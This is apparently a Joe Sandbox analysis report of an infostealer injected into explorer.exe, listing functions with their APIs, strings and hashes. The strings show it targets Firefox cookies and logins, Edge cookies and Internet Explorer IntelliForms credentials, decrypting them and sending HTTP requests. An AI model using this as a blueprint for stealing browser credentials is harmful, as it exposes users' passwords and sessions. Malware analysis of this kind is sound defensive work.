Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: lstrcat$Find$FileFolderPathlstrcpy$CloseFirstNextlstrlen
String ID: .cookie$.txt$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
API String ID: 4173611902-356491070
Opcode ID: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
Instruction ID: 220ae853cdd48a62214f164dd4fa3665551d7e862511993026e00d448b80a515
Opcode Fuzzy Hash: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
Instruction Fuzzy Hash: 47116D72318F8593DB20DB10F844B8A7365F3A8384F80553AE68E43A68EF3DD608CB00

Function 031141B4 Relevance: 9.1, APIs: 6, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
Instruction ID: 5b56df43b8afd65d3162a7ab842b399a27db45d08615d791dcbc6e59e9dbd298
Opcode Fuzzy Hash: 9e74177ae8edb192d765eaf2097ca1072eb58028511075e98d8bdaa32260b05f
Instruction Fuzzy Hash: 55316D35228B4083E764DBB6F8407DAB278FB8CBA4F804335E96A466E4DF78C565C701

Function 03115160 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE

HttpOpenRequestA.WININET ref: 03115305
HttpOpenRequestA.WININET ref: 03115391
InternetSetOptionA.WININET ref: 031153D0
HttpSendRequestA.WININET ref: 03115418
HttpSendRequestA.WININET ref: 03115439

Part of subcall function 031182B4: NtFreeVirtualMemory.NTDLL ref: 031182E5

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
String ID:
API String ID: 2140924187-0
Opcode ID: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
Instruction ID: f2eb4bd5cfbe046ea4978c2ceb4202e026aeaeed87daf8e00d8872c853810973
Opcode Fuzzy Hash: 835e16c16b22b6174a5754b7d25c6c2f2fafd1e7607b4187fe6f6a54c6a90b8c
Instruction Fuzzy Hash: 5A71DF76209B848AEB61DB14F4803DAB7A5F7CD784F544126EAC947A68EF7CC1A4CF40

Function 0E625CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0E627708: GetTempPathA.KERNEL32 ref: 0E627727
Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E62773D
Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E627746
Part of subcall function 0E627708: wsprintfA.USER32 ref: 0E62788A
Part of subcall function 0E627708: lstrcatA.KERNEL32 ref: 0E6278A0
Part of subcall function 0E627708: lstrlenA.KERNEL32 ref: 0E6278AD

CopyFileA.KERNEL32 ref: 0E625D1B
DeleteFileA.KERNEL32 ref: 0E625D76

Strings

SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies, xrefs: 0E625D53

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Filelstrcatlstrlen$CopyDeletePathTempwsprintf
String ID: SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies
API String ID: 4185374037-3522861938
Opcode ID: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
Instruction ID: c7842f32f9a888baff504d0a8f096e25f59aeb450b72ed7ab20c890dc61fd6ba
Opcode Fuzzy Hash: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
Instruction Fuzzy Hash: 6D01D432724E9583EB60DB51F854BA95370F7D9385F801825DA4A5BA18DF3AC908CF44

Function 03118D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32 ref: 03118D64
wsprintfA.USER32 ref: 03118D81

Strings

jones, xrefs: 03118D7A, 03118D87

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: NameUserwsprintf
String ID: jones
API String ID: 54179028-3844744938
Opcode ID: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
Instruction ID: f883b669a074776d88efff8c344976d27363d0ddbddc2f71675e7ee506cd8169
Opcode Fuzzy Hash: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
Instruction Fuzzy Hash: 5FF07572234A8797EB51DF14E8503E96325FB99744FC05131A14D46558EF7CC71AD740

Function 03118C30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

APIs

FindFirstVolumeW.KERNEL32 ref: 03118C6A
GetVolumeInformationW.KERNEL32 ref: 03118CBE
FindVolumeClose.KERNEL32 ref: 03118CCD

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: Volume$Find$CloseFirstInformation
String ID:
API String ID: 586543143-0
Opcode ID: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
Instruction ID: fa5ef3906b1834f54a347b08f39eadd560a72d972d0bc0df829e893919cd28b3
Opcode Fuzzy Hash: 143e719ddec52287121586d21c481339464cc0c977c9cf5c64880edffd785b6e
Instruction Fuzzy Hash: 8511C576219A40D7D761DB10E4843DBB7B4F789360F904636E2AA42AA8DF7CCA59CB40

Function 03117DFC Relevance: 3.1, APIs: 2, Instructions: 69threadCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 03117E48

Part of subcall function 0311B388: NtAllocateVirtualMemory.NTDLL ref: 0311B3BE

CreateThread.KERNEL32 ref: 03117F29

Part of subcall function 031182B4: NtFreeVirtualMemory.NTDLL ref: 031182E5

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: MemoryVirtual$AllocateByteCharCreateFreeMultiThreadWide
String ID:
API String ID: 3722359027-0
Opcode ID: 110fcd49ead3f1d7ea41d2ccc20f71e47c30cd7d15cfbb7269726683b3043d6e
Instruction ID: fa00cae9c2a5c5df36045857d2a5d5f1837d0b7f6db5204a5a55c575136e7294
Opcode Fuzzy Hash: 110fcd49ead3f1d7ea41d2ccc20f71e47c30cd7d15cfbb7269726683b3043d6e
Instruction Fuzzy Hash: A2311536228B8087DB50DB11F48479FB7A4F3C8784F505126EA8A87BA8CF7CC555CB40

Function 03118A58 Relevance: 1.6, APIs: 1, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 03118B6D

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
Instruction ID: f9f9ef0b467f842a10c4d4e6863531a6f17eb60b4bb4ce95bb91a3b022732f0b
Opcode Fuzzy Hash: dd05d69051d8526e51a2bec147cb8dd081a76b38c43059c36bd5d7d32c083d26
Instruction Fuzzy Hash: 5F41A576619A848BCB64CB19E49036AB7A0F3C8B84F144126EB8E83B28DB3CC551CF04

Function 03115078 Relevance: 1.6, APIs: 1, Instructions: 57filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET ref: 031150D4

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
Instruction ID: a09b35b6fcfc695f40a8d28b5db44180874963aa21750d095899d02d2d241045
Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
Instruction Fuzzy Hash: 6D21E8363296859BDB65CA15E45479AB3E2F3CCB88F404135EA8E83B58EB7DC654CF00

Function 03116C6C Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 03116C90

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
Instruction ID: a68cd68012bde66c314e436f151a151afad5d37626cd6dd8c320bec3abb99d1a
Opcode Fuzzy Hash: 0926225cdb8231c0071b822caba6bf63f9d334e810094fff266de868dfe5a6cc
Instruction Fuzzy Hash: EAE04F72624B8086D764DB20F48438A67A5F3CC394F845026EA8B46B28DF3DC295CB00

Function 0311321C Relevance: 1.5, APIs: 1, Instructions: 12threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 03113244

Memory Dump Source

Source File: 00000009.00000002.4141406733.0000000003110000.00000040.00000001.00020000.00000000.sdmp, Offset: 03110000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_3110000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1a60978effe268093f02d1f69aa5cacc1ea8261bca1eb0ed8a70301b3caa8571
Instruction ID: 0c17575200b1528aa24724fe68eaddf42accb549b42d3d215b8b2a389dac8496
Opcode Fuzzy Hash: 1a60978effe268093f02d1f69aa5cacc1ea8261bca1eb0ed8a70301b3caa8571
Instruction Fuzzy Hash: 67D01775554B4086E715CF10A8407CA73A8F38C354FC0021ADA8D02324CF3CC31ACB04

Function 0E6B4F10 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0E6B4F4E

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
Instruction ID: 120e8e426b90a8dff9e4cdf8ea9aed632cb29270aea9fe7bc689867572d1dca1
Opcode Fuzzy Hash: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
Instruction Fuzzy Hash: E8E0396075624085EE1467A2B9543F553989BC57E2F886B289E3F873C2EE28C8C1C325

Non-executed Functions

Function 0E627FD0 Relevance: 42.2, APIs: 12, Strings: 12, Instructions: 231COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 0E6280F6
swprintf.LEGACY_STDIO_DEFINITIONS ref: 0E628130

Strings

url, xrefs: 0E628163
password, xrefs: 0E6281AD
encryptedUsername, xrefs: 0E6280D3
username, xrefs: 0E628184
hostname, xrefs: 0E628150
created, xrefs: 0E62826F
timeCreated, xrefs: 0E62822E
encryptedPassword, xrefs: 0E628105
logins, xrefs: 0E628067
---, xrefs: 0E62817A, 0E6281A2, 0E628202, 0E628265
timeLastUsed, xrefs: 0E6281CF
lastused, xrefs: 0E62820C

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: swprintf
String ID: ---$created$encryptedPassword$encryptedUsername$hostname$lastused$logins$password$timeCreated$timeLastUsed$url$username
API String ID: 233258989-2527365753
Opcode ID: 3ab754e0dbf1d9f1fcf7561f5f0ed1f4612bf7d214603b1d67e64441ae75829c
Instruction ID: 1f7b2eed5f1ffd29b8cb920073798b569480fc9c95a7bf6d5bf972a6ac923340
Opcode Fuzzy Hash: 3ab754e0dbf1d9f1fcf7561f5f0ed1f4612bf7d214603b1d67e64441ae75829c
Instruction Fuzzy Hash: 7C91B121316FA181DA29DB62FC187A963A1FB85BD0F88463E8D1E27B54DF39DD05CB00

Function 0E669F68 Relevance: 24.9, APIs: 2, Strings: 12, Instructions: 433COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E66A490
_cwprintf_s_l.LIBCMT ref: 0E66A535

Strings

PRIMARY KEY missing on table %s, xrefs: 0E66A02F
sqlite_sequence, xrefs: 0E66A583
AUTOINCREMENT not allowed on WITHOUT ROWID tables, xrefs: 0E66A01C
view, xrefs: 0E66A219
CREATE %s %.*s, xrefs: 0E66A481
TABLE, xrefs: 0E66A212
table, xrefs: 0E66A224
UPDATE %Q.sqlite_master SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d, xrefs: 0E66A498
tbl_name='%q' AND type!='trigger', xrefs: 0E66A52B
CREATE TABLE %Q.sqlite_sequence(name,seq), xrefs: 0E66A519
must have at least one non-generated column, xrefs: 0E66A164
VIEW, xrefs: 0E66A208

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: AUTOINCREMENT not allowed on WITHOUT ROWID tables$CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$PRIMARY KEY missing on table %s$TABLE$UPDATE %Q.sqlite_master SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$must have at least one non-generated column$sqlite_sequence$table$tbl_name='%q' AND type!='trigger'$view
API String ID: 2941638530-2858624202
Opcode ID: d8fa5887fb59ee858004418a0ffaaab939b2e7d8b109de72841373869f685409
Instruction ID: 354a9b044cc4233e149ca4802ccdfb59934032480f32ce207b425c09027a2225
Opcode Fuzzy Hash: d8fa5887fb59ee858004418a0ffaaab939b2e7d8b109de72841373869f685409
Instruction Fuzzy Hash: 2B029E723247808BDB29DF66F5507AE77A0F785B88F40892ACF4A67B14DB39D815CB04

Function 0E628848 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108registrycomCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0E62887F
CoInitialize.OLE32 ref: 0E628891
CoCreateInstance.OLE32 ref: 0E6288B4
StrStrIW.SHLWAPI ref: 0E628933
CoTaskMemFree.OLE32 ref: 0E628956
CoTaskMemFree.OLE32 ref: 0E628965
RegCloseKey.ADVAPI32 ref: 0E6289A1
RegCloseKey.ADVAPI32 ref: 0E6289C6

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0E628875

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: CloseFreeTask$CreateInitializeInstanceOpen
String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 2849609203-680441574
Opcode ID: 8543e0224f209ace2cb915d059e2d896b75a719bdad6af399627b3eae6d821da
Instruction ID: 260b1965bf0db88c2a04a9e64a9afa5316974f77ed321274b5c47e3feb64cdc7
Opcode Fuzzy Hash: 8543e0224f209ace2cb915d059e2d896b75a719bdad6af399627b3eae6d821da
Instruction Fuzzy Hash: C8416932711A518AEB14CF79E8907AD3360FB98B88F94452ADE4A57B28DF39C948C740

Function 0E649D94 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 431COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E649FAC
__swprintf_l.LIBCMT ref: 0E64A043

Strings

-mj%06X9%02X, xrefs: 0E64A028
%.4c%s%.16c, xrefs: 0E649F9F
MJ delete: %s, xrefs: 0E64A078
MJ collide: %s, xrefs: 0E649FFC

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: __swprintf_l_cwprintf_s_l
String ID: %.4c%s%.16c$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
API String ID: 1809257383-4294478755
Opcode ID: 632da42df10d7e8ea20d2bac33d54132107c49394ff375faad723cf653b6cc55
Instruction ID: df5aa6d78d29b0c5941627988c12049547b6215a333bb175f0e04ea00eae188e
Opcode Fuzzy Hash: 632da42df10d7e8ea20d2bac33d54132107c49394ff375faad723cf653b6cc55
Instruction Fuzzy Hash: 4BF103A2351B9596DF25DFA6E09436A67A1FB8AF84F088529CF5E07754EF39C842C300

Function 0E6B1DA0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0E6B1E19
RtlLookupFunctionEntry.KERNEL32 ref: 0E6B1E31
RtlVirtualUnwind.KERNEL32 ref: 0E6B1E6C
IsDebuggerPresent.KERNEL32 ref: 0E6B1EA5
SetUnhandledExceptionFilter.KERNEL32 ref: 0E6B1EAF
UnhandledExceptionFilter.KERNEL32 ref: 0E6B1EBA

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 7fae68c0a360caa51e560666ef8391d39fa419a8a3bb68cb805654250a835efc
Instruction ID: 9752b5a2239773c1604470b86814680d64605a3dcff9f49e2688fa7e3cf963da
Opcode Fuzzy Hash: 7fae68c0a360caa51e560666ef8391d39fa419a8a3bb68cb805654250a835efc
Instruction Fuzzy Hash: A3314E36214F809ADB20CF65F8503EE73A4F799798F54052AEA9D43B58EF78C956CB00

Function 0E625FE4 Relevance: 1.5, APIs: 1, Instructions: 45encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0E62604E

Part of subcall function 0E626078: BCryptOpenAlgorithmProvider.BCRYPT ref: 0E6260C1
Part of subcall function 0E626078: BCryptSetProperty.BCRYPT ref: 0E6260EA
Part of subcall function 0E626078: BCryptGetProperty.BCRYPT ref: 0E626119
Part of subcall function 0E626078: BCryptGetProperty.BCRYPT ref: 0E62614C
Part of subcall function 0E626078: BCryptGenerateSymmetricKey.BCRYPT ref: 0E626180
Part of subcall function 0E626078: GetProcessHeap.KERNEL32 ref: 0E62618E
Part of subcall function 0E626078: HeapAlloc.KERNEL32 ref: 0E6261A1
Part of subcall function 0E626078: GetProcessHeap.KERNEL32 ref: 0E6262D3

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Crypt$HeapProperty$Process$AlgorithmAllocDataGenerateOpenProviderSymmetricUnprotect
String ID:
API String ID: 3167333787-0
Opcode ID: a79036e9377552ae0134f5617056aeee9adf5348f99882a79223a1d056d376af
Instruction ID: 0c379197942385e3414dd0640b07ec729498fbe796621c4e0a734c501c383914
Opcode Fuzzy Hash: a79036e9377552ae0134f5617056aeee9adf5348f99882a79223a1d056d376af
Instruction Fuzzy Hash: 3D01F972A15B91C5EB258B26F224B7E7790E745BC8F44C02DCA814A744CBBDC8D1DF00

Function 0E68C984 Relevance: 38.7, APIs: 5, Strings: 17, Instructions: 234COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E68CA6B
_cwprintf_s_l.LIBCMT ref: 0E68CB02
_cwprintf_s_l.LIBCMT ref: 0E68CBC1
_cwprintf_s_l.LIBCMT ref: 0E68CC9D
_cwprintf_s_l.LIBCMT ref: 0E68CCBD

Strings

INDEX %s, xrefs: 0E68CAD2
SCAN, xrefs: 0E68CA43
<expr>, xrefs: 0E68CB61
%s=?, xrefs: 0E68CBA6
>? AND rowid<, xrefs: 0E68CC71
VIRTUAL TABLE INDEX %d:%s, xrefs: 0E68CCAE
USING INTEGER PRIMARY KEY (rowid%s?), xrefs: 0E68CC92
ANY(%s), xrefs: 0E68CBAF
COVERING INDEX %s, xrefs: 0E68CAC9
PRIMARY KEY, xrefs: 0E68CA97
AUTOMATIC COVERING INDEX, xrefs: 0E68CABB
SEARCH, xrefs: 0E68CA2E
USING , xrefs: 0E68CAE8
%s %S, xrefs: 0E68CA64
AND , xrefs: 0E68CB96
rowid, xrefs: 0E68CB6F
AUTOMATIC PARTIAL COVERING INDEX, xrefs: 0E68CAAC

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: AND $ USING $ USING INTEGER PRIMARY KEY (rowid%s?)$ VIRTUAL TABLE INDEX %d:%s$%s %S$%s=?$<expr>$>? AND rowid<$ANY(%s)$AUTOMATIC COVERING INDEX$AUTOMATIC PARTIAL COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$rowid
API String ID: 2941638530-490416837
Opcode ID: 5609d86a449eaa2262b028ce808655fa91b50ecdad568c82cf7356fd653c3910
Instruction ID: 07c2b28c7ce3403e24f4f1c0fa7659516cd768fe156af72324b77bff1ad7ae3e
Opcode Fuzzy Hash: 5609d86a449eaa2262b028ce808655fa91b50ecdad568c82cf7356fd653c3910
Instruction Fuzzy Hash: F6A1F132700B94D6EB10EB22FA407AD77A4F315BC8F980A16CE0E27B94DB39C945C755

Function 0E64D8D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 232COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E64DAA3
_cwprintf_s_l.LIBCMT ref: 0E64DAC6

Strings

?, xrefs: 0E64DA14
-- , xrefs: 0E64D955
'%.*q', xrefs: 0E64DB45
zeroblob(%d), xrefs: 0E64DB98
%lld, xrefs: 0E64DA97
%02x, xrefs: 0E64DBC8
%!.15g, xrefs: 0E64DAB5
d, xrefs: 0E64D915
NULL, xrefs: 0E64DA7A

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$d$zeroblob(%d)
API String ID: 2941638530-2001737079
Opcode ID: 50dd37456a52db197c5fae96df0b8d6db7c1e1ee9478f8da2d6686cf9f3d2761
Instruction ID: 163ed552b4d91aee4bc5c39d000e554c4e7ea722fbbf556b14257748d83f87e3
Opcode Fuzzy Hash: 50dd37456a52db197c5fae96df0b8d6db7c1e1ee9478f8da2d6686cf9f3d2761
Instruction Fuzzy Hash: 57917BB2B28A8082CF11DF25F4507AD77A1F793788F84541AEB8A57B58DB79CC46CB00

Function 0E627E70 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0E627E9B
HeapAlloc.KERNEL32 ref: 0E627EAD
wcsftime.LIBCMT ref: 0E627ECF
GetProcessHeap.KERNEL32 ref: 0E627F89
HeapFree.KERNEL32 ref: 0E627F97
GetProcessHeap.KERNEL32 ref: 0E627FA2
HeapFree.KERNEL32 ref: 0E627FB0

Strings

firstUsed, xrefs: 0E627F41
lastUsed, xrefs: 0E627F63
value, xrefs: 0E627F1C
%d-%b-%Y %H:%M, xrefs: 0E627EC5
fieldname, xrefs: 0E627F09
---, xrefs: 0E627F37

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Process$Free$Allocwcsftime
String ID: %d-%b-%Y %H:%M$---$fieldname$firstUsed$lastUsed$value
API String ID: 282520901-236714635
Opcode ID: 1de12c7d0cb95b7ece7bf5d447a49f8a81228d3a086856385e106a0d56572571
Instruction ID: 13c8735677bd80e2d104216e5a4ee048e0b261f1c7a03b259c3c69aacc357ece
Opcode Fuzzy Hash: 1de12c7d0cb95b7ece7bf5d447a49f8a81228d3a086856385e106a0d56572571
Instruction Fuzzy Hash: 49318035705F9581DA10DB52F84839973A1FB99BC0F98883E8E9D57B18EF38D954CB04

Function 0E627924 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

StrToIntA.SHLWAPI ref: 0E627942
LocalFree.KERNEL32 ref: 0E627A36
GetProcessHeap.KERNEL32 ref: 0E627A41
HeapFree.KERNEL32 ref: 0E627A4F
GetProcessHeap.KERNEL32 ref: 0E627A5A
HeapFree.KERNEL32 ref: 0E627A68

Strings

url, xrefs: 0E62798D
password, xrefs: 0E6279BC
username, xrefs: 0E6279A4
created, xrefs: 0E627A0C
---, xrefs: 0E6279DC
lastused, xrefs: 0E6279E6

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Free$Process$Local
String ID: ---$created$lastused$password$url$username
API String ID: 2715961324-3110003818
Opcode ID: ae9d1f1f0e981be0e8047b727b1816052377ad78c367984ab3025b14375946f1
Instruction ID: b8abefb8a24bf934571ad00d39a2469bad0773317f70ac1dc18967762ffad7b5
Opcode Fuzzy Hash: ae9d1f1f0e981be0e8047b727b1816052377ad78c367984ab3025b14375946f1
Instruction Fuzzy Hash: 69316D32705F9081DB20EF52F84879973A0FB85BE0F54462A9EAE57B64DF38D954CB00

Function 0E631800 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 227COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 0E6318DA
__swprintf_l.LIBCMT ref: 0E631AA1

Strings

etilqs_, xrefs: 0E631824, 0E631A8F
winGetTempname5, xrefs: 0E631A79
winGetTempname2, xrefs: 0E6319BE
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 0E631AED
winGetTempname3, xrefs: 0E631931
winGetTempname4, xrefs: 0E631B1C
winGetTempname1, xrefs: 0E6318AD

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: __swprintf_l
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
API String ID: 1488884202-2699532598
Opcode ID: 7a8548f552223943e98c00528f88b614907a5d4a950986092cde20e46adef6c8
Instruction ID: f8cdc3fe2b61c650f249f1b081ec7662673f1d0d0580a45181c88d1ed795c4bb
Opcode Fuzzy Hash: 7a8548f552223943e98c00528f88b614907a5d4a950986092cde20e46adef6c8
Instruction Fuzzy Hash: 1A812362B06A8846DB149F35F8103B97792EB46BD4F984A3ECD4A077A4EF3CC806C704

Function 0E62A640 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 339COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 0E62A84A
__swprintf_l.LIBCMT ref: 0E62A885
